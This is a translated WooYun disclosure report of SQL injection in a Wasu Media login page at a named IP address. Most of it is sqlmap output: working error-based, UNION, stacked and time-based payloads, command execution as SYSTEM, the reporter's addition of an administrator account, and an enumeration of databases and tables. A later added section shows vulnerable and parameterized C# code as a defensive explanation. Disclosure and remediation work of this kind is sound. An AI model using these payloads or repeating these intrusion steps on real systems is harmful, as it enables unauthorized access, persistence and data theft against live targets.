Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0121959

Title: SQL injection in a Wasu system

Vendor: Wasu Media Network Co., Ltd. (华数传媒网络有限公司)

Author:

Submitted: 2015-06-23 15:49

Fixed: 2015-06-28 15:50

Published: 2015-06-28 15:50

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Vendor was notified but ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2015-06-23: Details sent to the vendor; awaiting vendor action
2015-06-28: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

**

Detailed description:

URL: http://218.108.255.183/UserLogin/Login.aspx
POST injection
Captured login request:

POST /UserLogin/Login.aspx HTTP/1.1
Host: 218.108.255.183
Proxy-Connection: keep-alive
Content-Length: 204
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://218.108.255.183
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://218.108.255.183/UserLogin/Login.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=hfivawitao0pgzzcqewfst45; JSESSIONID=1wx3gyfq326t51xahj4mziimtt; ems.userName=admin; ems.rememberName=true
__VIEWSTATE=%2FwEPDwUKLTIzMzMxOTU2NGRkRqk7KLeK6wUAcopjoFw%2BBISbkwo%3D&__EVENTVALIDATION=%2FwEWBAKHhpR8Au3yj58JAvfEm%2BEEAtqbqrEJS1XjZbZoLWoT5u6guLSYPuMyBC0%3D&hidSubmit=Login&txt_UserName=aaa&txt_Pwd=aaa


POST injection, with DBA privileges:

sts:
---
Place: POST
Parameter: txt_UserName
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUKLTIzMzMxOTU2NGRkRqk7KLeK6wUAcopjoFw BISbkwo=&__
EVENTVALIDATION=/wEWBAKHhpR8Au3yj58JAvfEm EEAtqbqrEJS1XjZbZoLWoT5u6guLSYPuMyBC0=
&hidSubmit=Login&txt_UserName=aaa' AND 5524=CONVERT(INT,(CHAR(58) CHAR(105) CHAR
(102) CHAR(116) CHAR(58) (SELECT (CASE WHEN (5524=5524) THEN CHAR(49) ELSE CHAR(
48) END)) CHAR(58) CHAR(105) CHAR(104) CHAR(111) CHAR(58))) AND 'gqgC'='gqgC&txt
_Pwd=aaa
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: __VIEWSTATE=/wEPDwUKLTIzMzMxOTU2NGRkRqk7KLeK6wUAcopjoFw BISbkwo=&__
EVENTVALIDATION=/wEWBAKHhpR8Au3yj58JAvfEm EEAtqbqrEJS1XjZbZoLWoT5u6guLSYPuMyBC0=
&hidSubmit=Login&txt_UserName=-6445' UNION ALL SELECT NULL,NULL,CHAR(58) CHAR(10
5) CHAR(102) CHAR(116) CHAR(58) CHAR(98) CHAR(108) CHAR(72) CHAR(108) CHAR(65) C
HAR(104) CHAR(100) CHAR(110) CHAR(81) CHAR(79) CHAR(58) CHAR(105) CHAR(104) CHAR
(111) CHAR(58),NULL,NULL,NULL-- &txt_Pwd=aaa
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUKLTIzMzMxOTU2NGRkRqk7KLeK6wUAcopjoFw BISbkwo=&__
EVENTVALIDATION=/wEWBAKHhpR8Au3yj58JAvfEm EEAtqbqrEJS1XjZbZoLWoT5u6guLSYPuMyBC0=
&hidSubmit=Login&txt_UserName=aaa'; WAITFOR DELAY '0:0:5'--&txt_Pwd=aaa
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUKLTIzMzMxOTU2NGRkRqk7KLeK6wUAcopjoFw BISbkwo=&__
EVENTVALIDATION=/wEWBAKHhpR8Au3yj58JAvfEm EEAtqbqrEJS1XjZbZoLWoT5u6guLSYPuMyBC0=
&hidSubmit=Login&txt_UserName=aaa' WAITFOR DELAY '0:0:5'--&txt_Pwd=aaa
---
[16:04:03] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[16:04:03] [INFO] testing if current user is DBA
current user is DBA: True
[16:04:03] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[16:04:03] [INFO] fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\218.108.255.183'
[*] shutting down at 16:04:03


As DBA, CMD commands can be executed directly:

os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] y
[16:11:59] [INFO] the SQL query used returns 1 entries
[16:12:00] [INFO] retrieved: "nt authority\\\\system"
command standard output [1]:
[*] nt authority\system
os-shell>
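As an added illustration (not the reporter's or the vendor's code) of the defect class behind the txt_UserName injection above, here is the ASP.NET/ADO.NET login query in its vulnerable concatenated form beside the parameterized form. The open SqlConnection passed in, the Users table, its UserName and PasswordHash columns, and the placeholder hash helper are assumptions.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Added example, not the vendor's code. The Users table, its UserName and
// PasswordHash columns, and the caller-supplied open SqlConnection are assumptions.
public static class LoginQueries
{
    // Vulnerable shape: the form fields are spliced into the SQL text, so a
    // value such as  aaa' AND 5524=CONVERT(INT,(...)) AND 'gqgC'='gqgC
    // or  aaa'; WAITFOR DELAY '0:0:5'--  is parsed as part of the statement.
    public static bool LoginVulnerable(SqlConnection conn, string userName, string password)
    {
        string sql = "SELECT COUNT(*) FROM Users WHERE UserName = '" + userName +
                     "' AND PasswordHash = '" + Hash(password) + "'";
        using (var cmd = new SqlCommand(sql, conn))
        {
            return (int)cmd.ExecuteScalar() > 0;
        }
    }

    // Hardened shape: the SQL text is constant and the values travel as typed
    // parameters, so quotes, UNION, ';' and WAITFOR in the input stay data.
    public static bool LoginSafe(SqlConnection conn, string userName, string password)
    {
        const string sql =
            "SELECT COUNT(*) FROM Users WHERE UserName = @user AND PasswordHash = @hash";
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@user", SqlDbType.NVarChar, 64).Value = userName;
            cmd.Parameters.Add("@hash", SqlDbType.Char, 64).Value = Hash(password);
            return (int)cmd.ExecuteScalar() > 0;
        }
    }

    // Placeholder hash (assumption) so the comparison is not against a plaintext
    // column; a real deployment uses a salted, slow password hash (e.g. PBKDF2).
    private static string Hash(string password)
    {
        using (var sha = System.Security.Cryptography.SHA256.Create())
        {
            byte[] digest = sha.ComputeHash(System.Text.Encoding.UTF8.GetBytes(password));
            return BitConverter.ToString(digest).Replace("-", "");
        }
    }
}
```

In the vulnerable function the reporter's error-based payload produces the CONVERT conversion error that sqlmap keys on; in the parameterized one the same string is simply a user name that matches no row. Parameterization does not change the separate finding that the application's SQL login is sysadmin ("current user is DBA: True"); running the application under a least-privilege database login, and leaving xp_cmdshell disabled, are the controls that would have stopped the os-shell step even if the injection had remained.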


An administrator account can be added;
I added wooyun/test123.
Listing the databases:

available databases [7]:
[*] master
[*] model
[*] msdb
[*] RMSS
[*] RMSS20140825
[*] RMSS_TEST
[*] tempdb


Table names:

Database: RMSS
[247 tables]
+-------------------------------+
| 1111111 |
| AssemblyAddress_List |
| AssemblyPortSource_Details |
| AssemblyPortSource_Details_Mb |
| AssemblyPortSource_Master |
| Assembly_Details |
| Assembly_List |
| CMTS |
| Cabinet_Info |
| ClientTypeA |
| ClientTypeALocal |
| Client_Info |
| Equipment_AdrDistribute |
| Equipment_Borrow |
| Equipment_Info |
| Equipment_Resource |
| Exit_LinkLayer |
| F_sjzd |
| Ggglll_Info |
| Ggjf_GggL_List |
| Ggjf_GggL_details |
| Ggjf_Jfsgd_List |
| Ggjf_Jfsgd_details |
| Gz_pb |
| Gz_pbgl |
| Gzcl_Gzbg |
| Gzcl_Gzcc |
| Gzcl_Gzlx |
| Gzcl_Gzly |
| Gzcl_Gzpg |
| Gzcl_Gztzsj |
| Gzgl_GzdjSet |
| Gzgl_Gzzy |
| Gzl_Cszy |
| Gzl_Gjsq |
| Gzl_Gjsq_wj |
| Gzl_Glzy |
| Gzl_Gzts |
| Gzl_Gzts_Cllc |
| Gzl_Gzts_CsNote |
| Gzl_Gzts_Gzzt |
| Gzl_IPwgzy |
| Gzl_Jfsg |
| Gzl_Jfzy |
| Gzl_Lcqd |
| Gzl_Xtbg |
| Gzl_xtbg_hcysz |
| Gztz_Cstz |
| GzzjDetail |
| GzzjMaster |
| IP_Bussiness |
| IP_Bussiness_Restore |
| IP_Distribute |
| IP_Explorer |
| IP_Free_Info |
| IP_Restore_Info |
| IP_Source_Master |
| IP_VPN_Distribute |
| JG_Resource |
| Jkgl_JkSb |
| Jkgl_Jkd |
| Jkgl_Khzy |
| Jkgl_Ywpz |
| Jkgl_Ywpz_gl |
| Jrlx_List |
| Keep_Watch_Group |
| Kh_Update_Log |
| Ly_Ht |
| Ly_Lyxx |
| Ly_Wygs |
| MachineRoom |
| MyGroups |
| MyGroups_Items |
| MyWork_NewPbgl |
| NDTV_Equipment |
| Numeral_TV |
| OA_Files |
| OA_Info |
| OA_tx |
| ONU_Dk |
| ONU_Dk_Mb |
| PVCID |
| PVCID_Distribute |
| RoleGroup |
| RoleItems |
| SMS_History |
| SMS_LOG |
| SMS_NotePad |
| SMS_Phrase |
| SMS_Team |
| SMS_TempPhone |
| SYS_Calendar |
| SYS_Calendar_Item |
| SYS_CurrUserList |
| SYS_FILE |
| SYS_GROUPS |
| SYS_Image |
| SYS_Lcsq |
| SYS_Lcsq_Gly |
| SYS_Lcsq_Glyqx |
| SYS_Log |
| SYS_MsgTable |
| SYS_PKeyInfo |
| SYS_RULES |
| SYS_TABLE |
| SYS_TABLE_FIELD |
| SYS_TaxClient |
| SYS_USERS |
| SYS_WFCAT |
| SYS_WFS |
| SYS_WFS_Controls |
| SYS_WFS_LINKS |
| SYS_WFS_Nodes |
| SYS_WFS_TABLES |
| SYS_WFS_UNITS |
| SYS_WFS_USERS |
| SYS_WF_Cscd |
| SYS_WF_MAIL_SMS |
| SYS_WF_PRCLNKS |
| SYS_WF_PRCS |
| SYS_WF_SHARE |
| SYS_WF_State |
| SYS_WF_State_Folder |
| SYS_WF_TASKS |
| SYS_WF_Task_Master |
| SYS_WF_Url |
| SbIpzygl |
| Signature |
| Spur_Track_Info |
| Sys_Mlcsq |
| Sys_Values |
| Sys_Wfs_Add |
| TCP_TOR |
| TS_ZD |
| TS_ZD_Info |
| T_Gw_User |
| T_User |
| T_User_Gwmc |
| T_dzxxgh |
| T_dzztgh |
| T_vlan |
| TaskDetail |
| TaskMaster |
| TaskPrivilege |
| Te_UserSelect |
| Transfers_Details |
| Transfers_Info |
| Ts_DataBackup |
| Ts_DataType |
| Ts_Dep_menu |
| Ts_E_Dep_menu |
| Ts_Gllx |
| Ts_Kh1 |
| Ts_Logs |
| Ts_UserRight |
| Ts_fz |
| Ts_onLineUser |
| Ts_sys_menu |
| Ts_userGroup |
| Ts_userGroupRight |
| Ts_userGroup_info |
| VPN_Resource |
| V_GsbDk |
| Vlan_Distribute |
| Vlan_Restore |
| Watch_Info |
| DataBase |
| assmblyportsource_master_bz |
| bs_code |
| ckll_backup |
| config |
| device |
| dtproperties |
| fav_dir |
| fav_link |
| file_temp |
| frjfb |
| frjrjft |
| ggjfjrsb |
| ip_bussiness1 |
| ip_store |
| ip_store_23 |
| ip_store_orign |
| kb_Files |
| kb_Files_Attachments |
| kb_Folders |
| kb_FoldersFiles |
| kb_Folders_AttachmentUser |
| kb_Folders_Privilege |
| kb_Privilege_Templates |
| kb_ProjectDocument |
| kb_files_Comment |
| kb_files_Reader |
| kb_files_Recommend |
| msn_dysw |
| msn_gongzuo |
| mylcsq |
| mylcsq_prcs |
| news |
| newsAnnex |
| play_evolutions |
| ref |
| ref_ip |
| selfuseing_ip |
| sqlmapoutput |
| sys_dwzt |
| sysdiagrams |
| t |
| temp_mylc |
| temp_mywork |
| tmp_ipbussinessid |
| todete |
| ts_GroupFzzjRight |
| ts_GroupHyRight |
| ts_GroupQyRight |
| ts_HyRight |
| ts_QyRight |
| ts_fzzg_right |
| ts_kh |
| ts_kh_ORA |
| ts_kh_restore |
| ts_kh_tmp |
| v_Kh_Lx |
| v_Kh_Rank |
| v_UserInfo |
| v_wt_all |
| vlan_temp1 |
| vlan_temp2 |
| voip_ip_store |
| vw_DepGzzj |
| vw_DepTask |
| vw_GggL_List |
| vw_PersonGzzj |
| vw_PersonTask |
| vw_gztj |
| vw_hotArticle |
| vw_iP_Restore_Info |
| vw_ip_distribute |
| vw_ip_free |
| vw_ip_source_master |
| vw_kb_FilesProjects |
| vw_newArticle |
| vw_recommandArticle |
| vw_sbly_List |
| vw_zww_IP_Restore_Info |
| vw_zww_ip_distribute |
| vw_zww_ip_source_master |
+-------------------------------+


Proof of vulnerability:

See title.

Fix recommendation:

**

Copyright notice: credit the source when reposting @WooYun (乌云)


Responses

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2015-06-28 15:50

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None